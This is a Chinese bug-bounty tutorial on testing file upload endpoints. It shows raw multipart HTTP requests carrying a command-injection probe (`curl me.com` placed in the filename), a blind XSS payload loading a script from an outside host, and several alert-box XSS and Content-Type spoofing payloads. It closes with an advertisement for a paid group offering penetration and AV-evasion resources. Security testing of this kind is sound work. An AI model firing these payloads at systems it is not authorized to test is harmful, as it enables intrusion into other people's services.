赏金猎人系列-如何测试文件上传功能-II
声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。
接前文: 赏金猎人系列-如何测试文件上传功能
本文继续讲解如何测试文件上传功能
尝试在文件名这里注入命令curl me.com
,看可否有RCE
POST /fileUpload HTTP/1.1
Host: company.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
Content-Length: NumberContent-Disposition: form-data; name="file"; filename="filename"
`curl me.com`
---------------------------------------WebKitFormBoundary--
文件名改为 file.''gif
,
content改为类似: <html><script> alert('XSS ');</script></html>
Content Type 改为 image/png
POST /fileUpload HTTP/1.1
Host: company.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
Content-Length: NumberContent-Disposition: form-data; name="file"; filename="file.''gif"
Content-Type: image/png
GIF8
<html><script>alert('XSS');</script></html>
------WebKitFormBoundary--
文件名插入大量的字符或者数字
POST /fileUpload HTTP/1.1
Host: company.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
Content-Length: NumberContent-Disposition: form-data; name="file"; filename="xxxxx+.png"
Content-Type: image/png
------WebKitFormBoundary--
content改为blind xss的payload:<html><head>><script src=https://me.xss.ht></script></head><body></body></html>
POST /fileUpload HTTP/1.1
Host: company.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
Content-Length: NumberContent-Disposition: form-data; name="file"; filename="file.html"
Content-Type: image/png
<html><head>><script src=https://me.xss.ht>
</script></head><body></body></html>
------WebKitFormBoundary--
content改为 xss的payload: <html><body><head> <html><script>alert('XSS');</script></html></head></body></html>
POST /fileUpload HTTP/1.1
Host: company.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
Content-Length: NumberContent-Disposition: form-data; name="file"; filename="file.html"
Content-Type: text/html
<html><body><head><script>
alert('XSS');</script></html></head></body></html>
------WebKitFormBoundary--
针对 Unallowed Type 和 Allowed Type分别设置两次和一次的Content-Type
下面举个Unallowed Type的例子:
POST /fileUpload HTTP/1.1
Host: company.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
Content-Length: NumberContent-Disposition: form-data; name="file"; filename="file.png"
Content-Type: text/html
Content-Type: image/png
<html><body><head><script>
alert('XSS');</script></html></head></body></html>
------WebKitFormBoundary--
https://infosecwriteups.com/command-injection-poc-72cc3743f10d
https://anotherhackerblog.com/exploiting-file-uploads-pt1/
https://anotherhackerblog.com/exploiting-file-uploads-pt-2/
https://websecblog.com/vulns/googleplex-com-blind-xss/
https://twitter.com/intigriti/status/1371454019533692930
★
欢 迎 加 入 星 球 !
代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员
进成员内部群
星球的最近主题和星球内部工具一些展示
关 注 有 礼
还在等什么?赶紧点击下方名片关注学习吧!
推荐阅读